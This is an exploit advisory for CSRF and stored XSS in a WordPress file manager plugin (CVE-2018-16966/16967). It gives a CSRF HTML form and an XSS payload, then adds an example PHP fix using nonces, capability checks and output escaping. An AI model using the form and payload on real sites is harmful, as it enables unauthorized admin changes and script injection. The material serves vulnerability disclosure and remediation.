Exploit Author : Mohammed Ansari S ( ansaert@gmail.com )
LinkedIn: https://www.linkedin.com/in/ansaert/
Discovered Date: September 11 2018
Affected Version: 3.0
Active installations: 200,000+
1# CSRF and stored XSS - CVE-2018-16966 and CVE-2018-16967
- Create *.html file
<form method="POST" action="http://localhost/wordpress498/wp-admin/admin.php?page=wp_file_manager_root">
<input type="text" name="public_path" value="typepayload"><br />
<input type="text" name="submit" value="Save Changes"><br />
<input type="submit">
</form>
Payload: "><script>alert(1);</script>
public_path=%22%3E%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E
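The form above submits no anti-CSRF token, and the payload relies on the saved public_path value being echoed into an attribute without escaping. The following is an added example, not the plugin's code or its actual patch: a settings handler that closes both issues with WordPress's nonce and escaping APIs. All example_fm_* function, action and option names are hypothetical.

```php
<?php
// Hypothetical settings handler: the example_fm_* names are assumptions
// made for illustration and do not come from the plugin.
add_action('admin_init', 'example_fm_save_settings');

function example_fm_save_settings() {
    // Only act on the settings form submission.
    if (!isset($_POST['submit'], $_POST['public_path'])) {
        return;
    }

    // Authorization: only administrators may change this setting.
    if (!current_user_can('manage_options')) {
        wp_die('Forbidden', 403);
    }

    // CSRF: dies unless the request carries a valid nonce for this action,
    // which a form hosted on another origin cannot obtain.
    check_admin_referer('example_fm_save_settings', 'example_fm_nonce');

    // Input handling: undo WordPress's added slashes, then strip tags
    // and control characters before storing.
    $path = sanitize_text_field(wp_unslash($_POST['public_path']));
    update_option('example_fm_public_path', $path);
}

function example_fm_render_form() {
    $path = get_option('example_fm_public_path', '');
    ?>
    <form method="post">
        <?php
        // Emits the hidden nonce field that check_admin_referer() verifies.
        wp_nonce_field('example_fm_save_settings', 'example_fm_nonce');
        ?>
        <!-- Stored XSS: esc_attr() encodes quotes and angle brackets so the
             stored value cannot close the attribute and inject markup. -->
        <input type="text" name="public_path"
               value="<?php echo esc_attr($path); ?>"><br />
        <input type="submit" name="submit" value="Save Changes">
    </form>
    <?php
}
```

Escaping at output is the control that stops the stored XSS; sanitizing on save is defense in depth and does not replace it.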